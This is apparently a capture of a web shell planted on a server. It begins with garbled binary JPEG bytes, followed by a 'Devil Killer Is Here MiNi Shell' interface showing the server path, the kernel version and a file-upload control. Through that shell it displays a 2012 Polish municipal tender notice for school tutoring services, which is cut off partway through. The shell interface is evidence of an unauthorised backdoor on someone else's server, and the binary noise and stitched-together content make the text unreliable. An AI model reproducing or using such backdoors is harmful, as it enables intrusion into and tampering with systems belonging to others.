JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/393050-N-2012.html

<p class="kh_header"><b>Narew: Lepszy start  wyrównywanie szans edukacyjnych uczniów z Gminy Narew</b><br>
<b>Numer ogłoszenia: 393050 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Narew , ul. Mickiewicza 101, 17-210 Narew, woj. podlaskie, tel. 0-85 6816016, faks 0-85 873 35 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.ug.narew.wrotapodlasia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Lepszy start  wyrównywanie szans edukacyjnych uczniów z Gminy Narew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający podzielił Projekt pt Lepszy start  wyrównywanie szans edukacyjnych uczniów z Gminy Narew na 7 działań - części
	Działanie 1  Przeprowadzenie zajęć z języka angielskiego metodą blended-learning dla uczniów Szkoły Podstawowej i Gimnazjum w Narwi.
	Działanie 2  Przeprowadzenie zajęć z matematyki dla uczniów Szkoły Podstawowej w Narwi.
	Działanie 3  Przeprowadzenie zajęć z matematyki dla uczniów Gimnazjum w Narwi.
	Działanie 4  Przeprowadzenie zajęć z języka rosyjskiego dla uczniów Szkoły Podstawowej w Narwi.
	Działanie 5  Przeprowadzenie zajęć z języka rosyjskiego dla uczniów Gimnazjum w Narwi.
	Działanie 6  Przeprowadzenie zajęć z zakresu edukacji wczesnoszkolnej dla uczniów Szkoły Podstawowej w Narwi.
	Działanie 7  Zakup podręczników i ćwiczeń do zajęć z matematyki, języka rosyjskiego oraz edukacji wczesnoszkolnej, zakup zeszytów i przyborów piśmienniczych, zakup nagród dla uczniów uczestniczących w projekcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 22.11.10.00-1, 22.83.00.00-7, 30.19.21.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie Wykształcenia wyższego pedagogicznego uprawniającego do nauczania matematyki, języka rosyjskiego, języka angielskiego oraz wykształcenia uprawniającego do prowadzenia edukacji wczesnoszkolnej - oddzielnie dla każdej części.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą udokumentować co najmniej roczne doświadczenie w pracy z uczniami. Dla działania 7 nie wyznacza się szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą udokumentować dysponowanie platformą edukacyjną on-line dla w działania 1. Dla działania 7 nie wyznacza się szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie  z art.22</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art.22</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ug.narew.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Narew 17-210 Narew ul. Mickiewicza  101  pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 09:45, miejsce: Urząd Gminy Narew 17-210 Narew ul. Mickiewicza 101 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, Działania 9.1  Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Priorytetu IX - Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki, na podstawie umowy o dofinansowanie nr UDA-POKL.09.01.02-20-548.11-00, podpisanej 9 stycznia 2012 roku
z Urzędem Marszałkowskim Województwa Podlaskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Działanie 1 - Przeprowadzenie zajęć z języka angielskiego metodą blended-learning dla uczniów Szkoły Podstawowej i Gimnazjum w Narwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu zajęć pozalekcyjnych z języka angielskiego z wykorzystaniem metody blended-learning w Zespole Szkolno-Przedszkolnym w Narwi zgodnie z wymogami podstawy programowej z języka angielskiego w szkole podstawowej i gimnazjum.
W zajęciach uczestniczyć ma 50 uczniów beneficjentów ostatecznych, w tym: 20 uczniów z klas IV-VI Szkoły Podstawowej w Narwi oraz 30 uczniów z klas I-III Gimnazjum w Narwi.
Uczniowie zostaną podzieleni na 5 grup zajęciowych, średnio 10 osobowych, zgodnie z wynikami rekrutacji przeprowadzonej przez Zamawiającego. Zamawiający utworzy następujące grupy zajęciowe:
	Grupa 1 - uczniowie z klas IV-V szkoły podstawowej.
	Grupa 2 - uczniowie z klasy VI szkoły podstawowej.
	Grupa 3 - uczniowie z klasy I gimnazjum.
	Grupa 4 - uczniowie z klasy II gimnazjum.
	Grupa 5 - uczniowie z klasy III gimnazjum.

Zajęcia dla każdej grupy mają trwać 100 godzin lekcyjnych. Zajęcia mają rozpocząć się w październiku 2012 roku, a zakończyć w maju 2013 roku.
W przypadku grupy zajęciowej uczniów z klas VI szkoły podstawowej oraz grupy zajęciowej uczniów z klasy III gimnazjum Zamawiający zastrzega sobie możliwość skrócenie czasu trwania zajęć do miesiąca kwietnia 2013 roku, celem przygotowania uczniów do sprawdzianu szóstoklasisty oraz egzaminu gimnazjalnego.
Zajęcia odbywać się mają w dniach i godzinach wyznaczonych przez Zamawiającego. Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Co najmniej raz na dwa tygodnie zajęcia mają być przeprowadzane w salach komputerowych z dostępem do Internetu. Zajęcia takie muszą być realizowane za pomocą platformy edukacyjnej on-line o następujących cechach:
	Platforma ma być osadzona w środowisku internetowym.
	Każdy z uczestników grupy będzie mógł korzystać z niej w dowolnym czasie i na dowolnym komputerze, również domowym, który posiada dostęp do Internetu.
	Uczeń będzie korzystał ze zindywidualizowanego toku nauki on-line po uprzednim zalogowaniu dostęp do konta uczestnika ma być chroniony hasłem.
	Platforma powinna zawierać materiały dydaktyczne umożliwiające naukę w zakresie gramatyki, słownictwa, doskonalenia umiejętności pisania, doskonalenia umiejętności rozumienia ze słuchu, czytania na przyjętych dla danej grupy poziomach nauczania.
	Prowadzący zajęcia ma mieć możliwość wysyłania uczniom zadań domowych za pomocą platformy.
	Platforma powinna umożliwiać generowanie raportów indywidualnych i grupowych.
	Platforma powinna posiadać funkcję archiwizowania ćwiczeń i testów wypełnianych przez uczniów.
	Prowadzący zajęcia mają mieć możliwość dodawania ćwiczeń do zestawów, które już istnieją w ramach platformy.
Platformę edukacyjną on-line o wymienionych cechach zapewnia Wykonawca.
Wykonawca wyposaży uczniów w podręczniki i ćwiczenia do nauki języka angielskiego, odpowiednie do poszczególnych grup zajęciowych, zawierające treści zgodne z podstawą programową z języka angielskiego w szkole podstawowej i gimnazjum. Proponowane podręczniki muszą być inne niż podręczniki obecnie wykorzystywane do prowadzenia zajęć z języka angielskiego w poszczególnych klasach w Zespole Szkolno-Przedszkolnym w Narwi. Wykaz wykorzystywanych podręczników stanowi załącznik nr 6 do SIWZ.
Wykonawca wyposaży uczniów w zeszyty i długopisy, o następującej specyfikacji:
1.	50 sztuk zeszytów 32 kartkowych w kratkę formatu A5. Okładka kolorowa, papier kreda błysk o gramaturze minimum 250 g z nadrukiem tytułu projektu - LEPSZY START - wyrównywanie szans edukacyjnych uczniów z gminy Narew, logotypami KAPITAŁ LUDZKI Narodowa Strategia Spójności oraz UNIA EUROPEJSKA Europejski Fundusz Społeczny zgodnie z wytycznymi oznaczania projektów w ramach projektu Kapitał Ludzki finansowanego ze środków Unii Europejskiej wraz z informacją Realizator projektu - Urząd Gminy Narew. Środek zeszytu - papier w kratkę offset gramatura minimum 80 g.
2.	50 sztuk długopisów z niebieskim wkładem z nadrukiem logotypów KAPITAŁ LUDZKI Narodowa Strategia Spójności oraz UNIA EUROPEJSKA Europejski Fundusz Społeczny zgodnie z wytycznymi oznaczania projektów w ramach projektu Kapitał Ludzki finansowanego ze środków Unii Europejskiej.
Projekty graficzne okładek zeszytów, długopisów przed dostawą winny być zaakceptowane przez Zamawiającego.

Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć z uwzględnieniem tematyki i liczby godzin zajęć oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji językowych m.in. testy, kartkówki. Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu test początkowy i test końcowy, a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące. Weryfikacja przyrostu kompetencji może odbywać się przy wykorzystaniu platformy on-line w tym przypadku Wykonawca powinien dostarczyć Zamawiającemu wyniki testów w wersji papierowej.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć listy obecności, dzienniki zajęć, testy sprawdzające itp..
Wystawienie zaświadczenia o ukończeniu zajęć dla każdego ucznia, który zakończył kurs.
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm. oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych Dz. U. Nr 100 poz. 102.
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Działanie 2 - Przeprowadzenie zajęć z matematyki dla uczniów Szkoły Podstawowej w Narwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu 60 godzin zajęć pozalekcyjnych z matematyki z 10 osobową grupą uczniów Szkoły Podstawowej w Narwi wymagających podniesienia kompetencji z matematyki, w ramach przygotowań do sprawdzianu szóstoklasisty, zgodnie z wymogami podstawy programowej z matematyki do szkoły podstawowej.
Zajęcia mają trwać 60 godzin lekcyjnych. Zajęcia odbywać się mają od października 2012 roku do kwietnia 2013 roku w dniach i godzinach wyznaczonych przez Zamawiającego.
Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Zajęcia realizowane będą z wykorzystaniem podręczników i ćwiczeń oraz zeszytów i długopisów dostarczonych przez Zamawiającego.

Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć (z uwzględnieniem tematyki i liczby godzin zajęć) oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji z matematyki m.in. testy, kartkówki Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu test początkowy i test końcowy, a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć listy obecności, dzienniki zajęć, testy sprawdzające itp..
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100 poz. 1024).
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Działanie 3 - Przeprowadzenie zajęć z matematyki dla uczniów Gimnazjum w Narwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu 60 godzin zajęć pozalekcyjnych z matematyki z 10 osobową grupą uczniów Gimnazjum w Narwi wymagających podniesienia kompetencji z matematyki, w ramach przygotowań do egzaminu gimnazjalnego, zgodnie z wymogami podstawy programowej z matematyki w gimnazjum.
Zajęcia mają trwać 60 godzin lekcyjnych. Zajęcia odbywać się mają od października 2012 roku do kwietnia 2013 roku w dniach i godzinach wyznaczonych przez Zamawiającego.
Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Zajęcia realizowane będą z wykorzystaniem podręczników i ćwiczeń oraz zeszytów i długopisów dostarczonych przez Zamawiającego.

Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć (z uwzględnieniem tematyki i liczby godzin zajęć) oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji z matematyki (m.in. testy, kartkówki). Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu (test początkowy i test końcowy), a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
